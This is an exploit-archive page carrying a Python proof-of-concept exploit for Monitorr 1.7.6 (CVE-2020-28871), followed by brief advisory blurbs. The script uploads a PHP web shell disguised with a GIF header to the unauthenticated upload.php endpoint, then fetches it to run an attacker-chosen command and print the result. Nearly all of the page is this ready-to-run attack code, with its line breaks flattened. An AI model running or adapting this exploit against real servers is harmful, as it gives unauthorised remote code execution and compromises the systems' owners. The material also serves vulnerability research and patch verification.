Headline
Monitorr 1.7.6 Shell Upload
Monitorr version 1.7.6 remote shell upload proof of concept exploit written in Python.
# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability# CVE: CVE-2020-28871import requestsimport randomimport string#from requests.auth import HTTPBasicAuthfrom colorama import (Fore as F, Back as B, Style as S)BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHTdef payL(): fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php' tf1=requests.post(url+'/assets/php/upload.php', files=( ('fileToUpload', (fileName, 'GIF87a\n<?php\n$var=shell_exec('+'"'+cmd+'"'+');\necho "$var"\n?>')),)) tf2=requests.get(url+'/assets/data/usrimg/'+fileName) print(tf2.text)def sig(): SIG = SB+FY+" "+FR+".-----..___.._____. "+FY+"\n" SIG += FY+" | .. >||__-__-_| \n" SIG += FY+" "+FR+"| |.' ,||_______ "+FY+"\n" SIG += FY+" | _ < ||__-__-_|"+FR+"* * *"+FY+" \n" SIG += FY+" | |\ \ ||__-__-_\n" SIG += FY+" "+FR+"|___ \_ \||_______| "+FY+"\n" SIG += FY+"\n"+" _____"+FR+"github.com/retrymp3"+FY+"_____\n"+ST return SIGdef argsetup(): about = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution\n'+ST return aboutif __name__ == "__main__": header = SB+FT+"\n"+' '+FR+'retrymp3\n'+ST print(header) print(sig()) print(argsetup()) #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"} url=input("Enter the base url: ") cmd=input("Command: ") payL()Related news
This Metasploit module exploits an arbitrary file upload vulnerability and achieves remote code execution in the Monitorr application. Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation. Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data). Monitorr versions 1.7.6m, 1.7.7d, and below are affected.
Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.